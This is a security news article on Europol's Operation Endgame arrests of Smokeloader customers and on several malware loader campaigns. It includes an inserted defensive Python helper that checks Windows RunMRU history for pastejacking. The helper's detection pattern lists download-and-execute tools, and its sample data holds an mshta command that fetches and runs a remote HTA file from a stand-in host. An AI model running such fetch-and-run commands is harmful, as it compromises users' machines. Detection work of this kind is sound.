
Law enforcement authorities have announced that they have tracked down customers of the Smokeloader malware and detained at least five individuals.
“In a coordinated series of actions, customers of the Smokeloader pay-per-install botnet, operated by the actor known as ‘Superstar’, faced consequences such as arrests, house searches, arrest warrants, and ‘knock and talks’,” Europol said in a statement.
Superstar is said to have run a pay-per-install service that customers used as a conduit to deploy the next-stage payload of their choice, giving them unauthorized access to victims’ machines.
According to European law enforcement, the access provided by the botnet has been used for a variety of purposes, including keylogging, webcam access, ransomware deployment, and cryptocurrency mining.
The latest action is part of a continuing, coordinated exercise called Operation Endgame, which last year led to the dismantling of online infrastructure linked to multiple malware loader operations, including IcedID, SystemBC, Pikabot, Smokeloader, Bumblebee, and Trickbot.
Canada, the Czech Republic, Denmark, France, Germany, the Netherlands, and the US participated in the follow-up efforts, which were intended to focus on the “demand side” of the cybercrime ecosystem.

According to Europol, authorities tracked down customers registered in previously seized databases, linked their online personas to real individuals, and called them in for questioning. An unspecified number of suspects are believed to have chosen to cooperate by allowing their personal devices to be examined for digital evidence.
“Several suspects resold the services purchased from Smokeloader at a markup, adding an additional layer of interest to the investigation,” Europol said. “Some of the suspects thought they were no longer on law enforcement’s radar, only to come to the harsh realisation that they were still being targeted.”
Malware Loaders come in a variety of shapes
The development comes as Broadcom-owned Symantec has revealed details of a phishing campaign that uses the Windows screensaver (SCR) file format to distribute a Delphi-based malware loader named ModiLoader (aka DBatLoader and NatsoLoader) to victims’ machines.
It also coincides with an evasive web campaign in which users are tricked into running malicious Windows Installer (MSI) files that deploy another loader malware called Legion Loader.
“This campaign uses a method called ‘pastejacking’ or ‘clipboard hijacking’, as viewers are instructed to paste content into the Run window,” said Palo Alto Networks Unit 42, adding that it leverages several cloaking strategies to avoid detection, such as a CAPTCHA page and a malware download page impersonating a blog site.
The phishing campaign is also a delivery vehicle for KOI Loader, which is then used to download and run an information stealer called KOI Stealer as part of a multi-stage infection sequence.
“The use of anti-VM features by malware such as KOI Loader and KOI Stealer highlights the threat’s ability to evade analysis and detection by analysts, researchers and sandboxes.”
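The pastejacking technique described above leaves a host-side trace: commands entered into the Windows Run dialog are recorded under the RunMRU registry key. The following triage helper is an added example, not code from the article or from Unit 42; the key path is real, while the token list and the sample entries are constructed assumptions to tune for your own environment.

```python
import re

# Windows keeps Run-dialog history under this key: values named a, b, c, ...
# each end in "\1", and MRUList holds the most-recent-first ordering.
RUNMRU_PATH = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

# Tokens that rarely appear in legitimate Run history but are typical of a
# pasted "verification" one-liner (assumption: adjust for your environment).
SUSPICIOUS = re.compile(
    r"(mshta|powershell|pwsh|cmd\s*/c|curl|bitsadmin|certutil|-enc|iwr|"
    r"invoke-webrequest|downloadstring|https?://)",
    re.IGNORECASE,
)


def triage_runmru(values: dict) -> list:
    """Return (value_name, command, matched_tokens) for suspicious entries,
    most recent first as given by the MRUList ordering."""
    order = values.get("MRUList", "")
    hits = []
    for name in order:
        raw = values.get(name, "")
        cmd = raw[:-2] if raw.endswith("\\1") else raw  # strip trailing "\1"
        tokens = sorted({m.lower() for m in SUSPICIOUS.findall(cmd)})
        if tokens:
            hits.append((name, cmd, tokens))
    return hits


# Constructed sample export of the key (not real data): entry "b" resembles a
# pasted clipboard-hijack command; the others are ordinary Run history.
SAMPLE_RUNMRU = {
    "MRUList": "bca",
    "a": "notepad\\1",
    "b": "mshta https://captcha-check.example/verify.hta\\1",
    "c": "services.msc\\1",
}

if __name__ == "__main__":
    for name, cmd, tokens in triage_runmru(SAMPLE_RUNMRU):
        print(f"{RUNMRU_PATH}\\{name}: {cmd!r} matched {tokens}")
```

On a live host the same dictionary can be built from a `reg export` of the key or via `winreg`, so the check works equally for forensic triage of an exported hive.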

And that’s not all. In recent months, we have once again witnessed the return of Gootloader (aka SlowPour), which spreads through Google’s sponsored search results, a technique first observed in early November 2024.
The attack targets users searching Google for “non-disclosure agreement templates” and serves fake ads that, when clicked, redirect to a site (“Lawliner[.]com”) where visitors are prompted to enter their email address to receive the document.

“Once they enter their email, they will receive an email from Lawyer@Skhm[.],” said a security researcher who goes by the name Gootloader and has been closely monitoring the malware loader for several years. “There is a link to the requested Word document (docx).”
“When the user passes all the gates, it downloads a zipped JavaScript file. When the user unzips and runs the JavaScript file, the same Gootloader behavior occurs.”
Also observed is a JavaScript downloader known as FakeUpdates (aka SocGholish), which is typically propagated through social engineering ploys that deceive users by disguising it as a legitimate update to web browsers like Google Chrome.

“Attackers use compromised resources to distribute malware, injecting malicious JavaScript into vulnerable sites to fingerprint hosts, perform eligibility checks, and display fake update pages,” Google said. “The malware is generally delivered via drive-by download. The malicious JavaScript acts as a downloader and delivers additional malware.”
Fake browser update attack chains have also been observed distributing two other JavaScript malware families: FakeSMUGGLES, named for its use of HTML smuggling to deliver the next-stage payload, such as NetSupport Manager, and FakeTreff.